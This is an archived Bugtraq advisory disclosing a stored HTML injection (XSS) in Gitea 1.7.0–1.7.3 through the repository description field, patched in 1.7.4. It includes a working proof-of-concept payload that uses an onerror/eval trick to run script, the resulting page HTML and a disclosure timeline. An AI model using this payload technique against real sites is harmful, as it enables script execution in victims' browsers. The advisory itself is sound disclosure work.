lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Date: Sun, 17 Mar 2019 23:08:49 +0200
From: Anti Räis <antirais@...il.com>
To: bugtraq@...urityfocus.com
Subject: Gitea 1.7.3 stored HTML injection (XSS)

Gitea 1.7.3 stored HTML injection (XSS)
#######################################

Information
===========

Name:          Gitea 1.7.0 - 1.7.3 stored HTML injection
Software:      Gitea - a self-hosted Git service
Homepage:      https://gitea.io/
Vulnerability: stored HTML injection
Affected:      1.7.0 - 1.7.3
Tested:        1.7.2, 1.7.3
Fixed:         1.7.4
Prerequisites: edit repository settings
Severity:      low
CVE:           NA

Credit:        Anti Räis
HTML version:  https://bitflipper.eu/

Description
===========

Gitea is a self hosted git repository service, which is affected by stored
HTML injection vulnerability, allowing authenticated user to inject payload
into repository's description field. It is executed, when victim navigates
to malicious repository's code page.

Proof of Concept
================

Attacker needs to create a new public repository and set the description
containing payload.

==================== source start ========================
<img id="xss" src="http://onerror=eval(
document.querySelectorAll('span')[10].innerText)//">
<span>document.querySelector('#xss').parentNode.innerHTML='\x3cmarquee
style=color:red\x3eXSS\x3c/marquee\x3e';alert('XSS')</span>
====================  source end  ========================

Code is executed, when victim navigates to malicious repository's code page.
Following HTML snippet demonstrates the issue:

==================== source start ========================
<div id="repo-desc">
    <span class="description has-emoji"><img id="xss" src="<a
    href="http://onerror=eval(
    document.querySelectorAll(&#39;span&#39;)[10].innerText)//">"
     target="_blank" rel="noopener noreferrer">http://onerror=eval(
     document.querySelectorAll(&#39;span&#39;)[10].innerText)//"></a>
<span>
document.querySelector(&#39;#xss&#39;).parentNode.innerHTML=&#39;\x3cmarquee
style=color:red\x3eXSS\x3c/marquee\x3e&#39;;alert(&#39;XSS&#39;)</span>
</span>
    <a class="link" href=""></a>
</div>
====================  source end  ========================

Impact
======

Authenticated attacker can execute JavaScript in the victim's browser and
possibly use it to change code in victim's repository.

Conclusion
==========

New release was published as a result and vulnerability is patched in Gitea
1.7.4.

References
==========

1) New release announcement
    https://blog.gitea.io/2019/03/gitea-1.7.4-is-released/

2) Patch pull request on github
    https://github.com/go-gitea/gitea/pull/6306

Timeline
========

28.02.2019 | me                 | vulnerability discovered
28.02.2019 | me > developer     | sent report to the developers; no response
06.03.2019 | me > developer     | asked for status update
06.03.2019 | developer > me     | answer to status update: they are working
           |                    | on a patch
13.03.2019 | developer > public | patched version released
17.03.2019 | me > public        | published vulnerability details

---
Anti Räis
Blog: https://bitflipper.eu
Pentester at http://www.clarifiedsecurity.com



Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ